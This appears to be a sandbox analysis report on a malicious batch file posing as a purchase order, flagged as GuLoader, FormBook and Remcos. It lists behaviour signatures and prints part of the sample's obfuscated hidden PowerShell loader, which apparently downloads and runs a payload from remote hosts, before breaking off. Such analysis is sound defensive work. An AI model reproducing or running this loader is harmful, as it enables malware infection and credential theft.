Edit tour
Windows
Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Overview
General Information
Detection
FormBook, GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7560 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\PO_GM _list_2808 2024202003 1808174182 80824_purc hase_doc_0 0000(991KB ).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7616 cmdline:
powershell .exe -wind owstyle hi dden "If ( ${host}.Cu rrentUICul ture) {$Af giftskolon ners42ncha mber='SUBs TR';$Apocr isiary++;} $Afgiftsko lonners42n chamber+=' ing';Funct ion Indban dtes($Fors imple){$Af rettere=$F orsimple.L ength-$Apo crisiary;F or( $Afgif tskolonner s42=2;$Afg iftskolonn ers42 -lt $Afrettere ;$Afgiftsk olonners42 +=3){$Nedg angene+=$F orsimple.$ Afgiftskol onners42nc hamber.'In voke'( $ Afgiftskol onners42, $Apocrisia ry);}$Nedg angene;}fu nction Slo shily($Par asollernes ){ & ($Paprr) ( $Parasolle rnes);}$Ve lproevet=I ndbandtes 'HeMB.o dz M,i.elFil Sa u/Sc5 P . G0Ry n( SW,oi.an.m d,to Tw.hs . S.NS,TS e S1.o0Ar. He0Ca; H , eWHji nnKi 6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0D i)Se ,rGr. e Mc ,kB.o Fo/Se2Fe0C a1 B0Su0R 1In0S,1R O ,FSliInrMu e SfduoAux F./L,1Zi2A r1R.. u0al ';$Hennes =Indbandte s ' ,UDisE peA.rG -Gg A eg ,ey.n BytB. ';$R eveled=Ind bandtes 'S thF.tSetF. pHos.l:Po/ .o/awa ,vU no,rcHyaRe lofdNao Dp .oeT r huR e.idcNooC. m.r/NeJDro fyuCos .e ,4Ma. .p n BgA.>Mih. itQttDep o s.o:Fr/In/ R a vS.oGa cSkapilO,d soo ,p ,eB erS,u.ao e nPreAn.Soc R.oSymFj/ .JE,oCouAr sVieB 4,d. Fap BnB,g , ';$Jejun e203=Indba ndtes 'Va> In ';$Papr r=Indbandt es 'B,iP,e hx H ';$G ushet='Zar istiske';$ Ansvarsbev idsthed = Indbandtes 'FoeAac,v hGuo E Me% CoaG pJ pK udAdaS t B a,u%,l\LiN ,eskgMalc .iL.gReeP. nBrt P.NoG N.a Bs S H e& P& i ,o eA,cOmhB o s. Ptul '; Sloshily ( Indbandtes ' U$Prg G lVeo.eb a rlGl: .AOb rS,n.pi Ln CgFoePa=S ,( lc emSm dRe i./Sic Al Fi$S,AA bn,as Av o aoprLasBub .reA v Si udalsPotHe hUde .dRi) C ');Slos hily (Indb andtes 'Co $Deg TlTao G.bpeaAclS u:MoBPalSe oJedS.s .k Sma tmTesU nf,oo .rSp hUnoAllM d InsP,=Sl$ MR Re fvEk e rlcaeV d Ad.Ves.lpU lPiiVatPa (Ta$DeJKoe Dij.nu anS iefe2Ka0 , 3Se)Hy '); Sloshily ( Indbandtes ' F[MoNUr e tC .AlS. ee .r,hv M i.kc ,e AP LeoIniC,nP et,iMToaBl n.eaApgHee Trr t]D.:E s: eSBreAe cKouObr.hi satTuyBePD rr Eo,rt.a o gc no lN a H,=Le M[ FoNPae otO p. SChePac .uBerKiiP rtBey,cPt. r oButUnoR ec Ho ,lF, TShyPop Xe Sl]Dr:K :S ,T SlFosB. 1Ir2To '); $Reveled=$ Blodskamsf orholds[0] ;$Lnindeho lde= (Indb andtes ',o $ g.il SoR hbLia Kln, : AG Vn,ua Chv,oeDer. hi.ee .t e s =KaN.ceV .w e-lrOU, b OjTre,oc Prt TST y Bls TtG.e FmKr.slNA. e.kt.e.MdW etrbDrCIn lSoiAjeOvn Gyt');$Lni ndeholde+= $Arninge[1 ];Sloshily ($Lnindeh olde);Slos hily (Indb andtes 'Fo $UnG Fn Ga C,vFleAfrR aiAdePrt,h s S.KrHAde DeaLsdS eN yr,rsGe[Ag $UnHK.e sn VgnBre Us s]Ov= E$Gu V ,eSclMop ,rDroVeer .v eCrtSk ');$Billar dkers=Indb andtes 'Sa $.vGUnn,ra CovAneU,r oiO,eCatLy sn,.CoDCao BrwP.nTel UoKoa kdRa F ri .lPre Me(.j$HaRN eeDrvO,eFa l,nemed B, Fo$PaG Oe Mr omS.a u nUniS.eS,s J.) . ';$G